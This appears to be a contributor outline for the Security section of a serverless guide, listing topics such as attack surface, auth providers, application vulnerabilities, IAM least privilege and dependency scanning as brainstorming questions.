Some suggested ideas and guidance for content in this section:
Security
How is security different in the serverless world?
Are there new concerns and challenges?
Are the existing best practices for security for cloud workloads still relevant?
Is relying on external auth providers, giving up control?
Managing data compliance and governance around company security policies?
Positives being Serverless
Not managing infrastructure is a huge positive as you don’t have to deal with OS, Kernel, software vulnerabilities.
Endpoint protections/application white listing/ - does not apply to serverless
Networking solutions, looking at the entire network to prevent attacks - does not apply to serverless
DDoS - distributed attack on events, API Gateway handles it - - does not apply to serverless, taken care by provider
Surface Area
Surface area for attack
The surface area may seem small but due to the proliferation of functions, it increases the surface area of attack.
Security distributed across functions
that is a positive but one bad function can spoil it for all. Access control/least priviledges is utmost important
Does small execution times reduce exposure?
Less time to sniff data off a function
Backdoors are not relevant in cloud workloads
Data Sharing
How is data shared in a stateless environment?
How is data isolated?
How can data be compromised in transit?
Integrations
How do integrations with Auth services and providers work?
Example of some services and auth providers - Auth0, Cognito
Application Vulnerabilities
Code injection into code (OWASP - researching), not dealing with input correctly, input validation of name of file (XRSF/CSRF), logging sensitive information
Attacks effecting the deployment, man-in-the-middle attacks
When the attacker compromises a function, what they can do in AWS is based on how the Access Control/permissions are set and effect DynamoDB, SNS (phishing email), permission to create users (persistency attacks), create other functions etc.
Vulnerability Scanning of deployed artifacts (dependencies, node_modules, binaries etc.)
Anamoly Detection: Are processes running as desired, understand normal functioning of functions and compare it to abnormal behavior, and identify anomalies
Access Management
Access Control groups and permission sets
Role-based access (IAM roles)
What about other provider-specific roles?
Vendor Specific
How does it translate to the Framework? Does it make it easier to manage? PureSec security plugin
Automatic setting of least privileged IAM roles/permissions
Description
Add content to the Security section of the guide.
Filename:
/guide/source/security/README.md
Page/Section: Security
Contributing Author: Shaked Zin (PureSec)
Details:
Some suggested ideas and guidance for content in this section:
Security
Positives being Serverless
Surface Area
Data Sharing
Integrations
Application Vulnerabilities
Access Management
Vendor Specific